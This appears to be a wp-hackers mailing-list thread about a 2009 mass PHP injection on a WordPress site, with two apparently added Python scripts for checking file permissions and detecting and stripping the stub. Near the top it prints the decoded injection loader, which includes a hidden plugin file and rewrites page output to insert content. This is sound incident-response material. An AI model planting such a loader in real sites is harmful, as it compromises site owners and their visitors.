Weird PHP Injection

I'm not sure if anyone has seen this before... except for this guy:
http://wordpress.org/support/topic/320918?replies=8

But I just ran into an issue with a client using WP2.8.4. It seems like every single file in WP (including themes and plugins) had this injected at the top:

<? /**/eval(base64_decode('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')); ?>

Which I decoded and prettied up for everyone:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;   // run-once guard: every infected file carries this stub, only the first one acts
    if(file_exists('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php')) {
        // the actual payload (which defines gml()) lives in the plugin directory; the stub only loads it
        include_once('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php');
        if(function_exists('gml')&&!function_exists('dgobh')) {
            if(!function_exists('gzdecode')) {
                // polyfill for PHP builds without gzdecode(): walk the gzip header flags, then inflate the body
                function gzdecode($R20FD65E9C7406034FADC682F06732868) {
                    $R6B6E98CDE8B33087A33E4D3A497BD86B = ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); // FLG byte
                    $R60169CD1C47B7A7A85AB44F884635E41 = 10;                                                 // offset past the fixed header
                    $R0D54236DA20594EC13FC81B209733931 = 0;
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {   // FEXTRA
                        $R0D54236DA20594EC13FC81B209733931 = unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                        $R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
                        $R60169CD1C47B7A7A85AB44F884635E41 += 2+$R0D54236DA20594EC13FC81B209733931;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {   // FNAME: skip the NUL-terminated name
                        $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {  // FCOMMENT: skip the NUL-terminated comment
                        $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {   // FHCRC: two-byte header CRC
                        $R60169CD1C47B7A7A85AB44F884635E41 += 2;
                    }
                    $RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
                    if($RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE) {
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868; // not gzip: pass the buffer through unchanged
                    }
                    return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                }
            }
            // output-buffer callback: decompress the finished page if needed and splice gml()'s output in right after <body>
            function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
                Header('Content-Encoding: none');
                $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
                if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
                    return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                } else {
                    return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90; // no <body> tag: prepend instead
                }
            }
            ob_start('dgobh');
        }
    }
}

I have no idea what it does and I'm not sure if the WP-phpMyAdmin plugin had a security hole or why it's part of this code. But I deactivated it on the client's site.

To clean it up:
I first tried just upgrading him to WP2.8.5, but as soon as I visited the site, it re-injected all the files with that crap. So I ran this script to remove it from all files:

find . -name '*.php' | xargs perl -pi -e "s#\<\? /\*\*/eval\(base64_decode\('.+'\)\); \?\>##g"

Then, for good measure I re-copied all the WP2.8.5 files back over. It seems to have fixed it for the client.

Also, for what it's worth, these are all the plugins that he had activated...

AddThis Social Bookmarking Widget
Advanced Excerpt
Akismet
Dagon Design Form Mailer
Event Calendar
Lightbox 2
NextGEN Gallery
Search & Replace
SEO Title Tag
Similarity
SimplePie Core
SimplePie Plugin for WordPress
Theme Switcher
Twitter Tools
Viper's Video Quicktags
WP-phpMyAdmin
wp-Table
WP-Table Reloaded
WPtouch iPhone Theme

I'm still digging to see if I can figure out where the actual hole was. Any ideas?

Lew Ayotte
Full Throttle Development, LLC
706.363.0688
478.246.4627
lew@...
http://fullthrottledevelopment.com
http://twitter.com/full_throttle
http://twitter.com/lewayotte
_______________________________________________
wp-hackers mailing list
wp-hackers@...
http://lists.automattic.com/mailman/listinfo/wp-hackers
Re: Weird PHP Injection

On Thu, Oct 29, 2009 at 2:45 PM, Lew Ayotte - Full Throttle Development <lew@...> wrote:
> I'm not sure if anyone has seen this before... except for this guy:
> http://wordpress.org/support/topic/320918?replies=8
>
> But I just ran into an issue with a client using WP2.8.4. It seems like
> every single file in WP (including themes and plugins) had this injected at
> the top:

In the cases where I've seen all files hit like this, I've always discovered two things.

1. The server is a shared host (many websites, same server).
2. The server itself is insecure (the web user can easily write to all the web facing files).

The usual method of entry is for some site (any site) on that shared server to get hacked. The attacker then runs a piece of code which simply recursively searches all sites on that system and adds its malicious code to them all that fit some pattern (like *.php, for example).

Well set-up shared servers don't have this problem. A server running suPHP, for example, would prevent this sort of attack because the PHP processes run under the user account, not the generic web account. So when the attacker gains privileges, he's running as the generic user who doesn't have the same kind of access that the "web" user does.

My advice: Switch hosts. A host that can't properly configure their systems is not one worth sticking with.

-Otto
Sent from Memphis, TN, United States
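Otto's second finding (the web user can write every web-facing file) is something a defender can measure rather than assume. The script below is an added example written for this thread, not code from Otto or from any project named here: it lists the regular *.php files under a docroot that a given uid and group set could modify, judged from the mode bits alone (POSIX ACLs are not consulted). The sample tree, its modes and the "web account" ids it is checked against are constructed inline.

```python
"""Which *.php files could the account PHP runs as rewrite? Added example for
Otto's point about shared hosts, not code from the thread; the sample tree and
the 'web account' ids it is checked against are constructed."""
import os
import stat
import tempfile
from pathlib import Path


def writable_by(st: os.stat_result, uid: int, gids: set) -> bool:
    """Classic Unix rule: owner bits apply if uid owns the file, else group bits if
    one of the account's groups matches, else the 'other' bits. POSIX ACLs are
    not consulted, so a 'no' here is necessary, not sufficient."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def web_writable_php(docroot: str, web_uid: int, web_gids: set) -> list:
    """Relative paths of regular *.php files under docroot that web_uid could modify."""
    root = Path(docroot)
    hits = []
    for path in root.rglob("*.php"):
        st = path.lstat()  # lstat: do not follow symlinks pointing out of the docroot
        if stat.S_ISREG(st.st_mode) and writable_by(st, web_uid, web_gids):
            hits.append(str(path.relative_to(root)))
    return sorted(hits)


def build_sample_docroot(root: Path) -> None:
    """Constructed tree: a normal 0644 file, a world-writable config and a
    group-writable plugin file."""
    (root / "plugins").mkdir()
    for rel, mode in (("index.php", 0o644), ("wp-config.php", 0o666),
                      ("plugins/x.php", 0o664)):
        p = root / rel
        p.write_text("<?php\n")
        p.chmod(mode)


def demo(web_owns_files: bool) -> list:
    """web_owns_files=False: PHP runs as some other account that owns nothing here
    (ids constructed as owner+1 / group+1 so they never match), i.e. another
    tenant's process under suPHP looking at this site. True: the files belong to
    the account PHP runs as, the insecure setup Otto describes, so every file
    comes back writable."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_docroot(root)
        owner = (root / "index.php").stat()
        if web_owns_files:
            uid, gids = owner.st_uid, {owner.st_gid}
        else:
            uid, gids = owner.st_uid + 1, {owner.st_gid + 1}
        return web_writable_php(tmp, uid, gids)


if __name__ == "__main__":
    print("separate web account  :", demo(False))
    print("web account owns files:", demo(True))
```

On a real host, point `web_writable_php` at one tenant's docroot while passing the uid and groups of another tenant's PHP process (what suPHP gives each site); anything it lists is exactly the cross-site write Otto describes. `demo(True)` reproduces the generic-web-user setup, where every file comes back writable.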
Re: Weird PHP Injection

I've seen this a lot lately. It's actually not just limited to WordPress since I've seen it in PHP-based forum software as well. While the code may not be exactly the same, it is similar enough to tell me that it is either the same family of code or a derivative.

In the forum case, a bug was exploited that allowed the attacker to load PHP code through an uploaded image that didn't filter against PHP files being uploaded. This initial PHP code goes through all the PHP files it can find on the site and adds code similar to what you have below to them. As seen in your partial decode, the code in each of the files calls the origin code each time to ensure that all new or cleaned up PHP files are remodified, thus making it hard to remove unless you find that origin file and remove it first.

I've yet to determine exactly how WordPress sites pick this up, but I wouldn't be surprised if it isn't through a similar process of being able to upload a PHP file to the server through a bugged piece of code. It is possible that a different method is used and that it is through compromised FTP, SSH, etc. credentials or through shared hosting with poor security that doesn't prevent the spread of files between different hosting accounts.

Every time I've seen code like this, it does nothing more than inject a hidden link farm into the content of the site. So, it's destructive to the search engine rankings of the exploited site, but I have yet to see it attempt to be anything more dangerous than that.

Chris Jean
http://gaarai.com/
@chrisjean

Lew Ayotte - Full Throttle Development wrote:
> I'm not sure if anyone has seen this before... except for this guy:
> http://wordpress.org/support/topic/320918?replies=8
>
> But I just ran into an issue with a client using WP2.8.4. It seems like
> every single file in WP (including themes and plugins) had this injected at
> the top:
Re: Weird PHP Injection

Thanks Otto,

It's actually a Rackspace managed server, not exactly shared hosting, only semi-shared, in the sense that each site they own is a virtual server. So it would only have access to the files on this particular virtualization.

I did another grep for "base64" which yielded some interesting results. These three files in particular:

wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/dg.php
wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/s.php
wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php

So there is a ton more encoded code in those files, but again, since this is located in the phpMyAdmin plugin dir for WP, it makes me think that it is an exploit in that particular plugin -- of course, it could just be a coincidence.

Chris,
Yeah, the only reason we noticed was because the code actually screwed up the formatting for wp-admin. Like it was missing a </div> or something.

Lew Ayotte
Full Throttle Development, LLC
706.363.0688
478.246.4627
lew@...
http://fullthrottledevelopment.com
http://twitter.com/full_throttle
http://twitter.com/lewayotte

On Thu, Oct 29, 2009 at 3:54 PM, Otto <otto@...> wrote:
> On Thu, Oct 29, 2009 at 2:45 PM, Lew Ayotte - Full Throttle
> Development <lew@...> wrote:
> > I'm not sure if anyone has seen this before... except for this guy:
> > http://wordpress.org/support/topic/320918?replies=8
> >
> > But I just ran into an issue with a client using WP2.8.4. It seems like
> > every single file in WP (including themes and plugins) had this injected
> > at the top:
>
> In the cases where I've seen all files hit like this, then I've always
> discovered two things.
>
> 1. The server is a shared host (many websites, same server).
> 2. The server itself is insecure (the web user can easily write to all
> the web facing files).
>
> The usual method of entry is for some site (any site) on that shared
> server to get hacked. The attacker then runs a piece of code which
> simply recursively searches all sites on that system and adds its
> malicious code to them all that fit some pattern (like *.php, for
> example).
>
> Well setup shared servers don't have this problem. A server running
> suPHP, for example, would prevent this sort of attack because the php
> processes run under the user account, not the generic web account. So
> when the attacker gains privileges, he's running as the generic user
> who doesn't have the same kind of access that the "web" user does.
>
> My advice: Switch hosts. A host that can't properly configure their
> systems is not one worth sticking with.
>
> -Otto
> Sent from Memphis, TN, United States
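Lew's cleanup (the perl one-liner plus re-copying the 2.8.5 files), Chris's point that the origin file re-modifies cleaned files until it is removed, and Lew's later grep for "base64" come down to three operations, and the added Python script below runs them against a constructed sample site. It is example code written for this thread, not something any of the posters or WordPress ships. It assumes the stub has exactly the `<? /**/eval(base64_decode('...')); ?>` shape quoted at the top of the thread; it decodes the payload to list the files it include()s (the candidates for the origin file), lists every .php that calls base64_decode the way Lew's grep did, and strips the stub. The sample site, its payload and the plugins/dg.php file are made up; only the style.css.php path comes from the thread.

```python
"""Triage for the eval(base64_decode(...)) stub discussed in this thread.
Added example, not code from the thread; the sample site built below is constructed."""
import base64
import re
import tempfile
from pathlib import Path
from typing import Optional

# Origin path quoted in the thread; used here only to build the sample payload.
ORIGIN = ("/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/"
          "styles/default/images/style.css.php")

# The stub shape quoted in the thread. The base64 group is restricted to the
# base64 alphabet, so a match stops at the first closing ')); ?>'.
STUB = re.compile(r"<\?\s*/\*\*/eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>")
# Files the decoded payload pulls in: candidates for the origin file that
# Chris says has to go first, or cleaned files get re-modified.
INCLUDE = re.compile(r"include(?:_once)?\s*\(\s*'([^']+)'\s*\)")


def decode_stub(src: str) -> Optional[dict]:
    """Decode the stub's payload and list the paths it includes; None if no stub."""
    m = STUB.search(src)
    if m is None:
        return None
    try:
        payload = base64.b64decode(m.group(1), validate=True).decode("latin-1")
    except ValueError:
        payload = ""  # undecodable blob: still report the file, with no origins
    return {"payload": payload, "origins": sorted(set(INCLUDE.findall(payload)))}


def php_files(docroot: Path) -> list:
    return sorted(p for p in docroot.rglob("*.php") if p.is_file())


def scan(docroot: str) -> dict:
    """Map each stubbed *.php (relative path) to the origin files its payload includes."""
    root = Path(docroot)
    found = {}
    for path in php_files(root):
        info = decode_stub(path.read_text(encoding="latin-1"))
        if info is not None:
            found[str(path.relative_to(root))] = info["origins"]
    return found


def files_calling_base64(docroot: str) -> list:
    """Lew's grep for "base64", narrowed to the decoder call: every *.php that
    mentions base64_decode, stubbed or not. Review hits by hand; a legitimate
    file that merely uses the function is not evidence on its own."""
    root = Path(docroot)
    return [str(p.relative_to(root)) for p in php_files(root)
            if "base64_decode" in p.read_text(encoding="latin-1")]


def clean(path: Path) -> bool:
    """Strip every stub from one file in place; True if the file changed."""
    src = path.read_text(encoding="latin-1")
    cleaned, n = STUB.subn("", src)
    if n:
        path.write_text(cleaned, encoding="latin-1")
    return n > 0


def build_sample_site(root: Path) -> None:
    """Constructed sample: one stubbed file, one clean file, one file that only
    calls base64_decode (stands in for the dg.php / s.php style hits in the thread)."""
    payload = f"if(file_exists('{ORIGIN}')){{include_once('{ORIGIN}');}}"
    blob = base64.b64encode(payload.encode()).decode()
    (root / "index.php").write_text(
        f"<? /**/eval(base64_decode('{blob}')); ?><?php\necho 'hello';\n")
    (root / "clean.php").write_text("<?php\necho 'clean';\n")
    (root / "plugins").mkdir()
    (root / "plugins" / "dg.php").write_text("<?php\n$s = base64_decode('aGVsbG8=');\n")


def demo() -> dict:
    """Scan, list base64 callers, strip stubs, rescan; returns everything for checking."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        before = scan(tmp)
        b64 = files_calling_base64(tmp)
        changed = [str(p.relative_to(root)) for p in php_files(root) if clean(p)]
        after = scan(tmp)
        index_after = (root / "index.php").read_text(encoding="latin-1")
    return {"before": before, "base64_files": b64, "changed": changed,
            "after": after, "index_after": index_after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run `scan` first and deal with every path it reports under origins (and with whatever the base64 listing turns up that is not a legitimate plugin file) before stripping stubs; otherwise, as Chris describes and Lew saw after the upgrade, the next request puts them back. The base64 group in the pattern is limited to the base64 alphabet, so a match cannot run past the first closing `')); ?>` even when the original file's own first line follows on the same line.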